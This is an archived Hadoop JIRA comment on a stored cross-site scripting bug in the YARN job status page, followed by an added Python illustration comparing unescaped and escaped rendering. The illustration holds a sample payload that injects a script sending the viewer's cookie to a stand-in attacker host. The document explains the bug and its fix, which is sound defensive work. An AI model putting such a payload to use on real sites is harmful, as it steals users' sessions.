hadoop-yarn-issues mailing list archives

From "Jason Lowe (JIRA)" <j...@apache.org>
Subject [jira] [Commented] (YARN-1932) Javascript injection on the job status page
Date Fri, 18 Apr 2014 16:42:18 GMT

    [ https://issues.apache.org/jira/browse/YARN-1932?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13974227#comment-13974227 ]

Jason Lowe commented on YARN-1932:
----------------------------------

+1 lgtm.  I'll commit this later today unless there are any objections.

> Javascript injection on the job status page
> -------------------------------------------
>
>                 Key: YARN-1932
>                 URL: https://issues.apache.org/jira/browse/YARN-1932
>             Project: Hadoop YARN
>          Issue Type: Bug
>    Affects Versions: 3.0.0, 0.23.9, 2.5.0
>            Reporter: Mit Desai
>            Assignee: Mit Desai
>            Priority: Blocker
>         Attachments: YARN-1932.patch, YARN-1932.patch
>
>
> Scripts can be injected into the job status page as the diagnostics field is
> not sanitized. Whatever string you set there will show up on the jobs page as is,
> i.e. if you put any script commands, they will be executed in the browser of the user who is
> opening the page.
> We need to escape the diagnostic string in order to not run the scripts.



--
This message was sent by Atlassian JIRA
(v6.2#6252)
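The issue described above is a stored cross-site scripting bug: a value controlled by whoever submitted the job (the diagnostics string) is concatenated into the HTML of a page that other users view. The following is an added illustration, not code from Hadoop YARN or from the YARN-1932 patch, and it does not reproduce Hadoop's own page-generation code. It uses a constructed toy template and a constructed diagnostics payload (the job id, the attacker.invalid host and the table layout are all assumptions) to show the unescaped rendering beside the escaped one, and uses Python's HTML parser to check what a browser would actually build from each: whether the injected text became a script element or stayed visible text in the diagnostics cell.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs (not taken from YARN). A job owner can set the
# diagnostics text for their own job, so an attacker controls this value.
MALICIOUS_DIAGNOSTICS = (
    "Task attempt failed: container killed"
    "</td></tr><script>document.location="
    "'http://attacker.invalid/?c='+document.cookie</script>"
)
BENIGN_DIAGNOSTICS = "Task attempt failed: exit code 1 (see logs)"


def render_job_status_unsafe(job_id, diagnostics):
    """Vulnerable rendering: the diagnostics value is pasted straight into the
    HTML body, so any markup it contains becomes part of the page structure."""
    return (
        "<table>"
        "<tr><th>Job</th><td>" + job_id + "</td></tr>"
        "<tr><th>Diagnostics</th><td>" + diagnostics + "</td></tr>"
        "</table>"
    )


def render_job_status_escaped(job_id, diagnostics):
    """Hardened rendering: same template, but every untrusted value is
    HTML-escaped for the element-content context it is placed in.
    quote=True also escapes ' and " so the same helper is safe inside a
    quoted attribute; it is still NOT sufficient inside a <script> block."""
    return (
        "<table>"
        "<tr><th>Job</th><td>" + html.escape(job_id, quote=True) + "</td></tr>"
        "<tr><th>Diagnostics</th><td>"
        + html.escape(diagnostics, quote=True)
        + "</td></tr>"
        "</table>"
    )


class _PageInspector(HTMLParser):
    """Records every element start tag and the decoded text of each <td>,
    i.e. roughly what a browser's DOM would contain after parsing."""

    def __init__(self):
        super().__init__()  # convert_charrefs=True: entities are decoded for us
        self.tags = []
        self.cells = []
        self._in_td = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "td":
            self._in_td = True
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "td" and self._in_td:
            self.cells.append("".join(self._buf))
            self._in_td = False

    def handle_data(self, data):
        if self._in_td:
            self._buf.append(data)


def _inspect(document):
    inspector = _PageInspector()
    inspector.feed(document)
    inspector.close()
    return inspector


def script_elements(document):
    """Number of <script> elements the parser built from the page. A status
    page like this should contain none, so nonzero means injected markup was
    parsed as HTML instead of being shown as text."""
    return _inspect(document).tags.count("script")


def cell_texts(document):
    """Visible text of each <td> in document order (job id first, then
    diagnostics), with HTML entities decoded as a browser would display them."""
    return _inspect(document).cells


if __name__ == "__main__":
    for name, render in (("unsafe", render_job_status_unsafe),
                         ("escaped", render_job_status_escaped)):
        page = render("job_1", MALICIOUS_DIAGNOSTICS)
        print(name, "script elements:", script_elements(page))
        print(name, "diagnostics cell:", cell_texts(page)[1])
```

In the unsafe rendering the payload closes the table cell and row and adds a `<script>` element, so the diagnostics cell ends at "container killed" and the script runs in the viewer's browser; in the escaped rendering no script element exists and the cell's visible text is the complete original string, angle brackets included. The caveat that matters when applying the fix: escaping has to match the output context. `html.escape` is correct for element content and quoted attribute values, but a value interpolated into an inline JavaScript string or a URL needs that context's escaping instead, and a page assembled from several contexts needs the right helper at each point.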
